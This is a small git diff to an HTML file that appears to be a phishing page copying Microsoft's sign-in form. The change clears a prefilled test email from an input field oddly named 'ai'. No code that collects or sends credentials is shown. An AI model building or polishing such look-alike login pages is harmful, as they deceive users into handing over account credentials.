--- a/index.html
+++ b/index.html
@@ -10248,7 +10248,7 @@
                             <span class="h5">Sign In</span><br>
                             <span id="error" class="text-danger" style="display: none;">That Microsoft account doesn't exist. Enter a different account</span>
                             <div class="form-group mt-2">
-                                <input type="email" name="ai" class="form-control rounded-0 border-dark" id="ai" aria-describedby="aiHelp" placeholder="Email, phone, or Skype" value="mail@mail.cpm " style="border-right: none;border-left: none;border-top: none;">
+                                <input type="email" name="ai" class="form-control rounded-0 border-dark" id="ai" aria-describedby="aiHelp" placeholder="Email, phone, or Skype" value=" " style="border-right: none;border-left: none;border-top: none;">
                             </div>
                             <p style="font-size: 13px">No account? <a href="#">Create one!</a></p>
                             <p style="font-size: 13px"><a href="#">Can't access your account?</a></p>
